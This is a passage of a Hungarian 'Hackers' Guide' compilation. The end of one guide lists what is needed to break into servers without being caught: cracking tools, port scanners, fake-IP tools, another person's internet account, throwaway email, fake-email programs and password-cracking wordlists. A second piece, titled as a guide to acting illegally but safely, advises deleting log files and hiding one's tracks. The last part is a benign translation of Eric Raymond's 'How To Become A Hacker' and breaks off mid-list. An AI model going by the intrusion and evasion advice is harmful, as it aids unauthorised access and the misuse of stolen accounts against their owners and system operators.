14. VEGUL: LEGY MAGABIZTOS, ES NE VESZITSD EL A FEJED BAJ ESETEN! Egy dolog betorni valahova. Sokkal nehezebb kijonni ugy, hogy nehogy elkapjanak utana es lehetoleg meg a server winchestereben se kelljen wipeolgatni. Mert az igazi hacker tudomanya ebben all! Hogy is vagjunk neki? Eloszoris szerezz be: - Oktato filekat a kulonbozo oprendszerek feltoreserol. - Programokat a kulonbozo oprendszerek feltoresehez. - Port Scannert - FTP Klienst - Telnet Klienst - Fake IP-t, Fake Hostot biztosito progit (lehetoleg) - Valakinek az Accountjat, amivel kitudsz egy szolgaltaton keresztul jutni a netre. (SAJAT ACCOUNTTAL HACKERKEDNI ONGYILKOSSAG!!!) - Szabad idot a hackerkedeshez - Legalabb 1, hamis adatokkal letrehozott Emailcimet egy ingyenes Emailcimet biztosito serveren. - Esetleg egy progit, amivel fake emailokat tudsz irni szukseg eseten. (Persze azt ne felejtsd el tesztelni eloszor!) - Egy vagy tobb filet, amiben abc, vagy cba sorrendben vannak szavak szotarbol kiirva (angol nyelvu mindenkepp kell, +1 olyan nyelvu, amilyen nyelvu orszag szerverere szeretnel betorni)! Ez a kodporgeto progikhoz kell. - Szotart kezkozelben, ha valamiert szukseged lenne ra! Vegszo Azt hiszem ennyi! Ezek utan mar nincs mas hatra, minthogy mindenkinek sok sikert kivanjak, es jo szerencset! Angolul pedig aki teheti tanuljon, mert az ilyen temaban irt szovegek 99%-a angol nyelven irodott, ertheto okokbol. Ezek utan pedig szerezzetek be a kellekeket, es kepezzetek magatokat, ha meg ezek utan is ugy gondoljatok, hogy hackerek akartok lenni! Szerző: Fireball And SpEcIaL ThNx 2: Zsu, wHo WaS The CoRReCtOR, and She GaVe ME CooL IdEaZ!
************************************************************************************************
53
Hackers’ Guide
Mi is a cracker? Hogyan tevékenykedj illegálisan de biztonságban
Ebben a rövid leírásban elmagyarázom neked a különbséget a hacker és a cracker között. Elmondom, hogy, hogyan válhatsz crackerré, és hogy, hogyan tudsz biztonságosan dolgozni a neten. Azonban ne feledd: Soha nem tudhatod, hogy ki, mikor és honnan figyel téged! A neten és az egyéb helyeken már rengeteg "leírás" és okfejtés született, hacker/cracker ügyben. Sajnos gyakran (szinte mindíg) keverik a fogalmakat pedig nagyon messzi állnak egymástól. A sajtó miatt mostmár a hacker egyet jelent a "csúnya rossz bácsikkal akik betörnek a számítógépes rendszerekbe és ellopják sok sok ember hitelkártyaszámát, megcsapolják bankszámláját. Ezt a tévhitet szétoszlatván nézzük meg, hogy mi is a különbség hacker és cracker között. A hackerek olyan emberek (gyakran programozók is) akik betéve tudják az operációs rendszerek és más egyéb programok működését és felépítését. Legtöbbször ők fedezik fel a biztonsági réseket is a programokban/rendszerekben. A hackerek állandóan képzik magukat, és a megszerzett információkat, új felfedezéseket is ingyen közzé teszik. És talán ami megkülönbözteni a crackerektől a hackereket az, hogy SOHA nem tesznek kárt a rendszerekben ahova bejutnak. A cracker olyan emberke aki kizárólag rombolás céljából tör be a rendszerekbe. Semmi más nem érdekli, csak a rombolás. A crackernek van egy másik " programozó alfaja" is aki programokat tör fel. Tehát a crackereket könnyű megkülönböztetni, mert általában a tevékenységük a rossz szándékon alapszik. [Megjegyezném, hogy gyakran a hackerek sem tudják egyértelműen besorolni magukat. Mert ugye ha a hacker nem rombol; akkor amikor a nyomokat eltünteti maga után akkor kell a log-fileokat buherálni sokszor komplett delete az egész log file... Szóval erre szoktam azt mondani, hogy a zseni és az őrült között is nagyon vékony a határ! - H3XR00T] Na... remélem kicsit azért megvilágosodott a hacker és a cracker közti különbség. Most pedig kicsit bővebben a crackerekről. Az első dolog amit nagyon ajánlanék az, hogy olvass sokat! A legjobb útja a tanulásnak. Persze angol nyelvismeret nélkül nem fog meni, de vannak olyan rendes emberek [Jaja! =) - H3XR00T] akik, ha idejük engedi lefordítgatják az angol szövegeket ikes magyar nyelvre... a másik fontos dolog a gyakrolás. Mert két dolog az elmélet, és a gyakrolat. Szövegeket rengeteget lehet találni a neten csak jó helyen kell őket keresni; általában minden hacker oldalon van valami kis ismertetőanyag. Mindent olvass el és nézd át az ismertebb oprendszerek leírását/műközdését! (Win9x,2000, Linux) Másodszor, ismerned kell a netet! Hogyan épül fel, minek mi a feladata, mit használ, mindent! Értsd a netet és segíteni fog a munkádban! Keress barátokat, és ne ellenségeket! Rengeteg ember van aki szívesen segít neked ha értelmes kérdéseket teszel fel nekik. De hangsúlyozottan értelmes kérdésekről van szó, és nem "taníts meg hackelni" típusú lamer kérdésekről. [Az ilyenekre, én nem is válaszolok... - H3XR00T] És csak akkor kérdezz ha már szerinted mindent 54
Hackers’ Guide
végigpróbáltál. Ha a birtokodba jut valami info akkor azt ne tartsd meg magadnak, oszd meg másokkal is! Mert ha te sem osztod meg akkor más se és akkor nem fog születni egyetlen egy ilyen doksi sem! Nézz meg sok hacker oldalt! Ezeken rengeteg naprakész információt találhatsz. [Példaképp megemlíteném, a magyarországi BO lázt. Nem dicsekvésképpen mondom, de talán Mo.-n az első körben próbálgattam ki ezt a trójai programot! Akkoriban a matávos előfizetőknek a fele már BO-val fertőzött volt! - H3XR00T] Ismerd meg a hackereket/crackereket! Kik ők, mit és miért csinálnak! Nézd meg a híresebb hackercsoportok weblapjait, kérdezz tőlük de ne hulye kérdéseket! Ismerd meg a trójai programokat, vírusokat, és kezdj ismertetőket írni és írd le mit tudsz! Ha találsz barátokat alapítsatok csapatot! NE lamer csapatot, igazi tevékeny csapatot! Mert ugye az nem sokat ér, ha vannak a csapatban 20-an és abból 2-3 dolgozik a többi még a levelezőlistára sem írogat... Mint már említettem szerezz barátokat! Soha ne mondj hülyeségeket! Nem tudhatod, hogy kivel beszélsz valójában! Lehet, hogy egy lamer, de lehet, hogy egy nálad nagyságrendekkel többet tudó cracker, és akkor véged! Nefeledd, hogy mindíg van olyan aki nálad többet tud! Lehetőleg ne törj fel oldalakat szórakozásból, és soha ne törj be oda ahol tudod, hogy várhatnak! Lehetőleg az állami intézményeket is kerüld. Mielőtt elkezdenél crackelni, tanuld meg a főbb dolgokat! Mi is az IP, hogyan épül fel, mi az ftp/telnet/www/e-mail/portok..stb. Ismerd meg hogyan működnek, és így lehetőséged nyílik a hibák feltárására, és akkor sikeresen betörhetsz! Még egy fontos dolog: tanuld meg C++ és/vagy Visual Basic -ben programozni. Ez a kettő mindenképpen nyelv kelleni fog a jövőben! Bár sok programot (Pl: exploit) lehet találni a neten, de ha nem találsz magadnak kell írnod egyet! Zárásként mindenféle egyéb dolgok... Rengeteg ember van akik heccből törnek fel számítógépeket. Ezek a lamerek. Hülye emberek akik megpróbálnak téged is elpusztítani. Ezér mindíg légy nagyon óvatos, és körültekintő! Soha ne fogadj el idegentől fileokat. Aki küldte lehet, hogy valójában vírust, vagy trójai programot küldött neked és amint elindítod véged van! Soha ne beszélj a terveidről a neten, mit fogsz feltörni, mikor... stb. Főleg ne nyílvános fórumokon. És soha ne felejtsd! Nem tudhatod ki figyel téged! Eredeti: tH3 m4n!4c
[email protected] - H3XR00T http://hexnet.hpage. net/
************************************************************************************************
Hogyan lesz az emberből Hacker
55
Hackers’ Guide
Miért ez az iromány? Mint a Zsargon Fájl szerkesztője, gyakran kapok e-maileket lelkes hálózaton kezdő újoncoktól, amikben (tulajdonképpen) az kérdezik, hogy "hogyan lehet belőlem is nagy hacker varázsló?". Különös, de úgy tűnik, hogy nincsen egy GyIK vagy Web oldal sem, ami ezzel a fontos kérdéssel foglakozna, úgyhogy itt van az enyém. Ha offline olvasod ezt a doksit, megtalálod a legfrissebb (angol nyelvű) változatot a http://www.tuxedo.org/~esr/faqs/hacker-howto.html weblapon. Mi az, hogy Hacker? A Zsargon fájlban találsz egy csomó definíciót a `hacker' kifejezésre, a legtöbbjükben szerepel a jó műszaki érzék, a problémamegoldás és a korlátok ledöntésének élvezete. Ha viszont konkrétan az érdekel, hogy hogyan lehetsz Te is hacker, akkor csak két dolog a fontos. Van egy kultúra, a kiváló programozók és hálózati varázslók közös kultúrája, ami évtizedekre nyúlik vissza, az első időosztásos miniszámítógépek és a legelső ARPAnet kísérletek idejébe. Ezek az emberek honosították meg a `hacker' kifejezést. Hackerek építették az Internetet. Hackerek tették a Unix operációs rendszert azzá, ami. Hackerek üzemeltetik a Usenet hírfórumokat. Hackerek tartják működésben a Világhálót. Ha ennek a kultúrának a része vagy, ha hozzájárultál valamivel és mások a közösségből ismernek és hackernek titulálnak, akkor hacker vagy. A hacker beállítottság nem korlátozódik a szoftver-hacker kultúrára. Vannak olyanok, akik a hacker mentalitást más területen gyakorolják, ez lehet pl. elektronika vagy zene -- valójában ezzel a viselkedési formával találkozhatsz a tudományok vagy a művészet legmagasabb szintjein. A szofver-hackerek elismerik ezeket a rokonlelkeket, néha nyíltan "hackereknek" is hívják őket -- egyesek azt vallják, hogy a hacker természet valójában független attól, hogy mit is hackel az illető. Ennek ellenére, e dokumentum hátralévő részében a szoftver-hackerek képességeivel és viselkedésükkel, valamint a `hacker' kifejezést létrehozó közös kultúra tradíciójával foglalkozom. Van egy másik csoport is, amely az hangoztatja magáról, hogy hackerekből áll, de ez nem fedi a valóságot. Ezek az emberek (főleg serdülő fiúk) azok, akik poénosnak tartják, hogy betörnek számítógépekre, vagy szórakoznak a telefonhálózattal. Az igazi hackerek ezeket az embereket `crackereknek' hívják és hangoztatják, hogy semmi közös nincs bennük. Az igazi hackerek szerint a crackerek lusták, felelőtlenek és nem briliáns elmék, azzal érvelnek hogy a biztonsági intézkedések megsértése nem tesz hackerré, ugyanúgy, ahogy attól sem leszel közlekedésmérnök, ha el tudsz kötni egy autót. Sajnos sok író és újságíró keveri a két kifejezést, a crackereket is a `hacker' kifejezéssel írja le; ez kimondhatatlanul idegesíti az igazi hackert. Az alapvető különbség: a hackerek építenek, míg a crackerek rombolnak. Ha hacker akarsz lenni, olvass tovább. Ha cracker akarsz lenni, olvasd el az alt.2600 hírcsoportot, és készülj fel öttől tíz évig terjedő börtönbüntetésre, miután kiderült, hogy nem vagy olyan okos, mint hitted. Ennyit a crackerekről. A hacker hozzáállása A hacker problémákat old meg és dolgokat hoz létre, hisz a szabadságban és a kölcsönös önkéntes segítségnyújtásban. Ahhoz, hogy befogadjanak a hackerek,
56
Hackers’ Guide
Neked is hasonló hozzáállást kell tanúsítanod. Ahhoz, hogy ennek az elvárásnak megfelelően tudjál viselkedni, tényleg hinned kell ebben a hozzáállásban. Ha úgy gondolod, hogy csak azért viselkedsz úgy, mint a hackerek, hogy befogadjanak, akkor elsiklasz a lényeg felett. Az, hogy higgyél ennek a viselkedésnek a helyességében, nagyon fontos Neked -- ez segít a tanulásban, és ez motivál. Mint minden kreatív művészetnél, nem elég a mestert csak ésszel imitálni, szívvel is kell. Tehát, ha hacker akarsz lenni, ismételgesd a következő dolgokat, amíg el nem hiszed őket: 1. A világ tele van lebilincselő, megoldásra váró problémákkal Hackernek lenni szórakoztató dolog, de ez az a fajta szórakozás, ami erőfeszítést igényel. Az erőfeszítés nagy része a motiváció. A sikeres atlétákat az fizikailag mámorító érzés motiválja, hogy testüket tökéletesítik, és a lehető legjobbat kihozva magukból túlszárnyalják a saját fizikai korlátjaikat. Ehhez hasonlóan, akkor lehetsz jó hacker, ha izgalomba hoznak a megoldásra váró problémák, cél és motiváló erő a képességeid fejlesztése és az elméd edzése. Ha természetednél fogva nem így érzel, meg kell változnod ahhoz, hogy sikeres hacker legyél. Máskülönben gyorsan azon kapod magad, hogy a hackelésre szánt energiád elfolyik más irányba, mint pl. szex, pénz vagy társadalmi elismerés megszerzésének irányába. (Ezek mellett meg kell tanulnod hinni a tanulási képességedben -- hinni abban, hogy ha nem is tudsz mindent, ami a probléma megoldásához kell, ha elkezded a probléma egy részét boncolgatni, megtanulsz közben annyit, amennyi a következő részfeladat megoldásához szükséges -- és így tovább, amíg az egész problémát meg nem oldod.) 2. Soha senkinek nem kell ugyanazt a problémát kétszer megoldani A kreatív elmék értékes és korlátozott erőforrást képeznek. Nem szabad őket a kerék újrafeltalálására pazarolni, amikor annyi új érdekes probléma vár megoldásra. A hacker magatartására jellemző, hogy tudatában van annak, hogy a többi hacker ideje értékes -- ezért az információ megosztását majdnem erkölcsi kötelességének érzi. Az így megosztott megoldások segítségével más hackerek új problémákkal tudnak foglakozni. (Nehogy azt hidd, hogy minden kreativitásodból származó szellemi termékedet be kell dobnod a közösbe, bár minél többet adsz, annál jobban fog a többi hacker tisztelni. A hacker értékekkel összefér, ha eladsz annyit magadból, hogy kifizesd a lakbért, tudjál kaját és számítógépeket venni. Belefér, ha hackelésből eltartod a családodat, sőt az is, ha meggazdagszol, mindaddig, amíg nem felejted el, hogy hacker vagy.) 3. Az unalom és a robotolás rossz Hackert (és a kreatív embereket általában) nem szabad unalomra ítélni vagy ostoba, robotolás jellegű munkára fogni, ha ez mégis megtörténik az azt jelenti, hogy nem azt csinálja, amihez csak ő ért -- megoldást keresni új problémákra. Ez a pazarlás mindenkinek rossz. Ezért az unalom és a robotolás nem csak kellemetlen, de rossz is mindenkinek. 57
Hackers’ Guide
Ha hackerként akarsz viselkedni, akkor annyira kell ebben higgyél, hogy automatizáld az unalmas dolgokat, amennyire csak lehet, nem csak magad miatt, de mindenki más miatt is (főleg a többi hackerért). (Erre a szabályra egy látszólagos kivétel van. A hackerek csinálnak néha dolgokat, amelyek unalmasnak és robotjellegűnek tűnhetnek a kívülálló számára, de valójában ezekre azért van szükség, hogy egy képességet fejlesszenek, vagy gyakorlatot szerezzenek valamiben, amit másképp nem ismerhetnének meg. Ez azonban a hacker saját választása -- egy gondolkodó embert sem szabad unalomba kényszeríteni.) 4. A szabadság jó dolog A hacker természeténél fogva hatalomellenes. Bárki, aki parancsokat osztogat neki, akadályozza az éppen soron lévő érdekes probléma megoldásában -- és mivel tudjuk, hogyan működik a parancsokat osztogatók agya, ez előbb utóbb elkerülhetetlen lesz, kitalálnak valami ostoba okot. Tehát a parancsolgató magatartás ellen küzdeni kell, bárhol ahol találkozol vele, nehogy megfojtson Téged, vagy hacker társaidat. (Ez nem jeleni azt, hogy mindennemű hatalmat bírálni kell. A gyerekeknek szükségük van irányításra, és a bűnözőknek felelniük kell tetteikért. A hacker dönthet úgy, hogy elfogad bizonyos szintű irányítást, ha valami olyasmit kap ez által, ami fontosabb Neki, mint az utasítások követésére elpazarolt idő. De ez csakis korlátozott lehet, szó nincsen arról a személyes behódolásról, amit a parancsolgató beállítottságú emberek elvárnak.) A parancsolgató ember lételeme a cenzúra és a titkolózás. Bizalmatlan mindennel szemben, ami önkéntes együttműködés és információmegosztás -- csak az olyan `együttműködést' szereti, amit ő irányít. Tehát ha hackerként akarsz viselkedni, ki kell fejlesszél egy ösztönös ellenszenvet a cenzúra, a titkolózás és a felelős felnőtt emberek erőszakos kényszerítése iránt. Nem csak hinned kell, hogy ez a helyes, hanem e szerint kell cselekedned. 5. A magatartás nem helyettesíti a kompetenciát Ahhoz, hogy hacker lehess, ki kell fejlesztened az előbb felsorolt tulajdonságok közül néhányat. De kizárólag a viselkedés másolásával nem lehetsz hacker, ugyanúgy, ahogy világbajnok atléta sem, vagy rocksztár. A hackerré váláshoz intelligencia kell, gyakorlat, elhivatottság és kemény munka. Ezért meg kell tanulnod, hogy nem szabad bízni a viselkedésben, és tisztelni kell bármilyen szaktudást. A hacker nem pazarolja az idejét szimulánsokra, de értékeli a szakértelmet -- főleg a hackeléssel kapcsolatos szakértelmet, de bármilyen más irányú szaktudás is elismerendő. Ha a szaktudásod olyan területet is lefed, amihez kevesen értenek, az jó, ha olyan terület szakértője vagy, ami precíz logikai képességeket, szellemi erőt és koncentrációs képességet igényel, az a legjobb. Ha tiszteled a hozzáértést, örömöd telik majd a képességeid fejlesztésében -- a kemény munka és az, hogy ennek szenteled magad, egy komoly játék lesz, és nem robotolás. Ez életbevágóan fontos, ha hacker akarsz lenni. Alapvető képességek hackeléshez
58
Hackers’ Guide
A hacker hozzáállás létfontosságú, de a képességek még fontosabbak. A viselkedés nem helyettesíti a kompetenciát, van egy alapvető képességtár, amivel rendelkezned kell, mielőtt a hackerek társuknak tartanak. Ezek a képességek lassan változnak az idők során, ahogy a technológia fejlődik, új területek jönnek létre, melyek új képességeket igényelnek, a régiek ezzel párhuzamosan elavulnak. Például, az alapképességek közé tartozott régebben a gépi kódban való programozás, míg a HTML ismerete csak az utóbbi időben vált szükségessé. Jelenleg a következők tartoznak a hacker alapműveltségéhez: 1. Tanulj meg programozni Ez, természetesen, az alapvető tudás, minden hacker számára. Ha nem ismersz egyetlen programozási nyelvet sem, javaslom, hogy kezdjél a Pythonnal. Jól tervezett, jól dokumentált és relatíve kíméletes a kezdőkkel. Annak ellenére, hogy jó kezdő nyelv, nem csak játékszer; a python egy nagyon sokoldalú és rugalmas nyelv, amely alkalmas nagy projektek létrehozására. Legyél tisztában azzal, hogy nem fogod elérni a hacker szaktudását, vagy akárcsak egy egyszerű programozóét sem, ha csak egy nyelvet ismersz -- meg kell tanulnod nyelvtől függetlenül gondolni a programozási problémákra. Ahhoz, hogy igaz hacker lehess, el kell jussál arra a pontra, amikor egy új programozási nyelvet néhány nap alatt meg tudsz tanulni, a leírások alapján, abból kiindulva, amit már tudsz. Ez azt jelenti, hogy több, egymástól nagyon különböző nyelvet kell megtanuljál. Ha komoly programozásba kezdesz, meg kell tanulnod a C nyelvet, a Unix alapnyelvét (a C-t ettől függetlenül nem ajánlom első nyelvnek). Az egyéb fontos nyelvek közé tartozik a Perl és a LISP. A Perlt gyakorlati okok miatt érdemes megtanulni; gyakran használják dinamikus web oldalak létrehozásához és rendszeradminisztrációhoz, tehát ha nem is írsz soha Perlt, mindenképp érdemes megtanulnod olvasni azt. A LISP-et a megvilágosodás mély érzése miatt érdemes megtanulni, amit akkor érzel, amikor végre sikerül megérteni, hogy miről is van szó; ez a tapasztalat jobb programozóvá tesz a hátralévő napjaidra, még akkor is, ha nem használod majd gyakran a LISP-et. A legjobb, igazából, ha ezt a négy nyelvet (Python, C, Perl, és LISP) mind megtanulod. Amellet, hogy ezek a hacker alapnyelvei, nagyon eltérő módon közelítik meg a programozást, mindegyikből hasznos és értékes új ismeretekre tehetsz szert. Nem tudok kimerítő leírást adni arról, hogy hogyan tudsz megtanulni programozni -nagyon összetett tudásról van szó. Egyet azonban elárulhatok: a könyvek és tanfolyamok nem érnek túl sokat (sok, valószínűleg a legtöbb hacker autodidakta). Aminek van értelme: (a) kódot olvasni és kódot írni. Programozni megtanulni ugyanolyan, mint a saját anyanyelveden megtanulni írni. A legjobb módszer, ha beleolvasol abba, amit a mesterek írtak, majd írsz valamit, utána olvasol még egy jó adag kódot, írsz egy keveset, olvasol még egy adagot, írsz még egy kicsit... és mindezt addig ismétled, amíg a saját kódodban el nem kezded felfedezni a példaképek kódjainak jó vonásait. Régen nehézkes volt jó, olvasásra érdemes kódot találni, mert kevés nagy program forráskódja állt a zöldfülű hackerfiókák rendelkezésére. Ez drasztikusan megváltozott; ma már nyílt forráskódú szoftverek, programozási eszközök és
59
Hackers’ Guide
operációs rendszerek (ezeket is mind hackerek írták) könnyedén elérhetők bárki számára. Ez át is vezet minket a következő témához... 2. Szerezz be egy nyílt forráskódú Unixot és tanuld meg használni Abból indulok ki, hogy van egy PC-d, vagy hozzáférsz valahol egyhez (ezeknek a mai gyerekeknek olyan könnyű dolguk van :-)). Az legfontosabb lépés a hackerré válás útján: szerezz be valamilyen Linuxot vagy BSD-Unixot, telepítsd fel a gépedre, és tanuld meg használni. Igen, vannak a Unixon kívül más operációs rendszerek a világon. De azokat binárisokban terjesztik, ergo nem tudod olvasni vagy módosítani a kódot. Hackelni tanulni DOS, Windows vagy MacOS alatt olyan, mintha kényszerzubbonyban próbálnál táncolni tanulni. Mindezek mellett, nem szabad megfeledkezni arról, hogy a Unix az Internet operációs rendszere. Megtanulhatod ugyan az Internet használatát Unix ismeretek nélkül, de biztosan nem lehetsz Internetes hacker. Éppen ezért, manapság a hacker kultúra elég határozottan Unix-központú. (Ez nem volt mindig így, néhány régi motoros a mai napig nem tud ezzel megbékélni, de a Unix és az Internet közötti szimbiózis annyira megerősödött, hogy még a Microsoft sem tud igazán csorbát ejteni rajta.) Tehát húzzál fel egy Unixot -- én személy szerint a Linuxot szeretem, de van választék (és igen, lehet ugyanazon a gépen felváltva Linuxot és DOS / Windows-t használni). Tanuld meg használni. Játsszál vele. Lődd össze az Internetet vele. Olvasd a forrásokat. Módosítsd a forrásokat. Olyan programozási eszközökkel fogsz találkozni Linux alatt (pl. C, LISP, Python és Perl), amilyenekről egy Microsoft operációs rendszer alatt álmodni sem mernél, jól szórakozol, és olyan sok tudást szívsz magadba, hogy bele sem gondolsz, egészen addig, amíg már profi hackerként vissza nem emlékszel ezekre az időkre. Ha többet akarsz tudni a Unix-ról, vess egy pillantást a Loginatakára. Információt találsz arról, hogy hogyan és honnan szerezzél be Linuxot a Honnan szedjek Linuxot? című oldalról. Találhatsz BSD Unix-al kapcsolatos segítséget és linkeket a http://www.bsd.org/ címen. (Megjegyzés: Nem ajánlom, hogy Linux vagy BSD telepítésbe kezdjél egyedül, ha teljesen kezdő vagy a témában. Ha Linuxal próbálkozol, keress meg egy helyi felhasználó csoportot [ilyen Magyarországon az LME] és kérj segítséget, vagy vedd fel a kapcsolatot a Linux Internet Support Co-Operative-al. A LISC üzemeltet IRC csatornákat is, ahol [angol nyelvű] segítséget kaphatsz.) 3. Tanuld meg használni a Világhálót (World Wide Web) és a tanulj meg HTML-t írni A hackerek által létrehozott dolgok többsége észrevétlenül a háttérben működik, segíti a gyárakban, irodákban és egyetemeken folyó munkát, látszólag nem befolyásolva a nem-hackerek életét. A Web az egyetlen nagy kivétel, a hatalmas csillogó-villogó hacker játékszer, amiről még a politikusok is elismerik, hogy
60
Hackers’ Guide
megváltoztatja a világot. Ezért (valamint egy csomó más nyomós ok miatt) meg kell tanulnod a Webbel dolgozni. Ez nem csak azt jelenti, hogy meg kell tanulnod Web-böngészőt használni (ezt bárki megteheti), hanem azt is, hogy el kell sajátítanod a HTML-t, a web nyelvét. Ha nem tudsz programozni, a HTML tanulása közben felvehetsz bizonyos jó szokásokat, amiknek hasznát veszed a későbbi tanulmányaid során. Tehát hozzál létre egy honlapot. Az, hogy van egy honlapod, még közelítőleg sem jelenti azt, hogy hacker vagy. A Web tele van honlapokkal. A legtöbbjük értelmetlen, nulltartalmú hulladék -- tarka hulladék, mondhatnád, de attól még ugyanúgy szemét. (erről többet olvashatsz a A HTML Pokol oldalán). Hogy olvasásra érdemes legyen egy lap, kell legyen tartalma -- érdekes és vagy hasznos kell legyen más hackerek számára. Ez átvezet a következő témához... Státus a Hacker kultúrában, közösségben Mint a legtöbb pénz és gazdaság nélküli kultúra, a hackerség meghatározó eleme a hírnév. Érdekes problémákat próbálsz megoldani, de azt, hogy ezek a problémák valójában mennyire érdekesek és hogy igazából a mennyire jó a megoldásod, csak azok tudják megítélni, akik szintén szakértők a kérdéses területen. Ehhez hasonlóan, amikor a hackerek szabályai szerint játszol, megtanulod, hogy az alapján kapod a jó pontokat, hogy mások mire tartják a szakértelmedet (ezért írtam korábban, hogy addig nem vagy igazi hacker, amíg nem a többiek hívnak annak). Ezt a tényt elhomályosítja az a kép, ami a hackelést magányos munkának tünteti fel, valamint az a hacker körökben elterjedt nézet, miszerint a büszkeség vagy az, hogy mások mit gondolnak, nem lehet a motiváló tényezők része. Egészen pontosan, a hackerség az, amit az antropológusok ajándék kultúrának neveznek. Nem az által szerzel egy ilyen társadalomban hírnevet, hogy elnyomsz másokat, azzal sem, hogy szép vagy, vagy olyan dolgokat birtokolsz, amikért mások áhítoznak, hanem azzal, hogy adsz. Másokra áldozod történetesen az idődet, a kreativitásodat és a szaktudásod gyümölcseit. Alapvetően öt dolgot tehetsz, hogy kivívd a hackerek elismerését: 1. Írj nyílt forráskódú szoftvert Az első (legfontosabb és legelfogadottabb) módja a bevágódásnak, ha olyan programot írsz, amiről a hackerek úgy látják, hogy hasznos vagy jópofa, és elérhetővé teszed a forrását, hogy az egész közösség felhasználhassa azt. (Ezeket a munkákat ``free software''-nek hívtuk, de mivel nem volt mindenki számára egyértelmű, hogy a ``free'' a szabadra vagy az ingyenesre utal-e, sokunk inkább az ``open-source'' azaz nyílt forráskódú szoftver kifejezést részesíti előnyben.) A hacker kultúra legelismertebb félistenei olyan emberek, akik nagy, hasznos programokat írtak, amikre széles körben volt szükség, majd a közösség rendelkezésére bocsátották ezeket, hogy mindenki szabadon felhasználhassa őket. 2. Segíts nyílt forráskódú szoftvert tesztelni és debuggolni
61
Hackers’ Guide
Azok munkája is nagyon hasznos, akik tesztelik és javítják a nyílt forráskódú szoftvereket. Ebben a tökéletlen világban elkerülhetetlen, hogy a szoftverfejlesztésre szánt idő tetemes részét hibakereséssel és javítással töltsük. Ezért minden józan eszű, nyílt forráskódot karbantartó szerző egyet fog velem érteni, amikor azt írom, hogy a jó béta-tesztelő (aki világosan le tudja írni a tüneteket, jól tudja lokalizálni a problémát, el bírja viselni a hibákat az összecsapott kiadásokban, hajlandó néhány egyszerű diagnosztizáló eszközt alkalmazni) megéri a súlyát gyémántban. Egy szem ilyen béta-tesztelő eldöntheti, hogy a hibakeresés egy kétségbeejtő, kimerítő rémálom vagy csak egy hasznos kellemetlenség. Ha újonc vagy, keress egy fejlesztés alatt álló programot, ami érdekel és próbálj jó béta-tesztelő lenni. Innen már magától megy minden, a tesztelés után besegíthetsz a hibakeresésbe, utána besegíthetsz a fejlesztésbe. Sokat tanulhatsz így, és jó pontot szerezhetsz olyan embereknél, akik segíthetnek majd a későbbiek során. 3. Tegyél közzé hasznos információkat Még egy jó dolog, amit megtehetsz, a hasznos és érdekes információ kiszűrése majd Web lapon, vagy GyIK (Gyakran Ismételt Kérdések listája) dokumentumokban való közzététele. A főbb szakmai GyIK-ek karbantartói majdnem olyan elismerésben részesülnek, mint a nyílt forráskódú szoftvert író programozók. 4. Segíts működésben tartani az infrastruktúrát A hacker kultúrát (és így egyben az Internet fejlesztését is) önkéntesek tartják karban, működésben. Sok szükséges ám kevésbé látványos és vonzó munkát kell elvégezni, hogy a gépezet működjön -- levelezési listákat kell adminisztrálni, hírcsoportokat moderálni, hatalmas szoftver archívumokat fenntartani, RFC-ket és más technikai szabványokat írni. Azok az emberek, aki ezeket a feladatokat jól látják el, nagy tiszteletben állnak, mert mindenki tudja, hogy a munkájuk borzalmasan időt rabló, és nem olyan mókás, mint a kódolás. Akik ezt a fajta munkát csinálják, elhivatottak. 5. Szolgáld a hacker társadalmat Végül, szolgálhatod és népszerűsítheted magát a hacker kultúrát (például azzal, hogy írsz egy részletes bevezetőt arról, hogy hogyan lesz az emberből hacker :-)). Ez nem olyasmi, amit meg tudsz csinálni, amíg nem vagy a hacker társadalom résztvevője egy bizonyos időn keresztül és nem válsz ismerté az előző négy pont valamelyike által. A hacker társadalomnak nincsenek kimondott vezetői, de vannak hősei, ``vénjei'', történészei és szóvivői. Ha már elég régóta vagy a csatasorban, ezek egyikévé nőheted ki magad. De ne feledd: a hackerek bizalmatlanok a túl nagy mellénnyel rendelkező ``vénekkel'' szemben, tehát veszélyes ezt a stádiumot látványosan elérni. Ne törekedjél erre, inkább helyezkedj úgy, hogy az öledbe hulljon, majd legyél szerény, és ápold gondosan a kapcsolataidat. A Hacker / Kocka összefüggés A népszerű híreszteléssel ellentétben, ahhoz, hogy hacker legyél, nem kell, hogy "kocka" légy. Ettől függetlenül segítségedre lehet -- a valóságban sok hacker
62
Hackers’ Guide
"kocka". Ha társadalmilag kirekesztett vagy, az segít abban, hogy az igazán fontos dolgokra koncentrálj, mint pl. az elmélkedés és a hackelés. Ezért sok hacker felvállalja a ``kocka'' bélyeget, sőt, büszkén használják a durvább ``geek'' kifejezést is -- így függetlenítik magukat a konvencionális társadalmi elvárásoktól. A Geek oldalon olvashatsz bővebben a témáról. Ha meg tudod oldani, hogy elég figyelmet fordítasz a hackelésre ahhoz, hogy jó hacker legyél, és emellett normális életet is tudsz folytatni, akkor jó. Ez manapság sokkal könnyebb feladat egy újonc számára, mint az én időmben volt, a 70-es években; napjainkban a társadalom sokkal toleránsabb a techno-megszállottakkal szemben. Sőt, egyre több ember jön rá, hogy a hackerek gyakran kiváló minőségű szerető és férj alapanyagok. Ha azért vonz a hackelés, mert nincs életed, az is OK -- legalább nem vonja el semmi a figyelmedet. Lehet, hogy később még az is kialakul. Pontok a stílusért Még egyszer, ahhoz, hogy hacker legyél, úgy kell gondolkodj, mint egy hacker. Vannak dolgok, amiket ez érdekében megtehetsz, ha éppen nem számítógép előtt ülsz. Ezek nem helyettesítik a hackelést (azt semmi sem helyettesítheti), de sok hacker foglalkozik ilyen dolgokkal, így ezek is kapcsolódnak a hackelés lényegéhez. •
Olvass tudományos-fantasztikus irodalmat. Járjál tudományos-fantasztikus témájú klubokba, gyűlésekre. (Ott találkozhatsz hackerekkel és protohackerekkel).
•
Tanulmányozd a Zen-t, és/vagy tanulj harci művészeteket. (A meditálás is hasonló sok szempontból.)
•
Tanuld meg a zenét elemző füllel hallgatni. Tanuld meg értékelni az egyéni zenei stílusokat. Tanulj meg valamilyen hangszeren játszani vagy énekelni.
•
Barátkozz meg a szójátékokkal.
•
Tanulj meg jól és helyesen írni az anyanyelveden. (Meglepően sok hacker, többek között a legjobbak, akiket ismerek, jó írók.)
Ezek közül minél több dolog tűnik természetesnek Neked, annál jobb hackeralapanyag vagy. Hogy miért pont ezek a dolgok, az nem teljesen világos, de valószínűleg összefüggés van közöttük és az agy jobb és bal féltekéjében honos képességek sora között, amelyek a hacker számára elengedhetetlenek (a hacker képes kell legyen logikusan gondolkodni, de ki is kell tudjon lépni az adott probléma látszólagos logikájából). Végül néhány kerülendő dolog: •
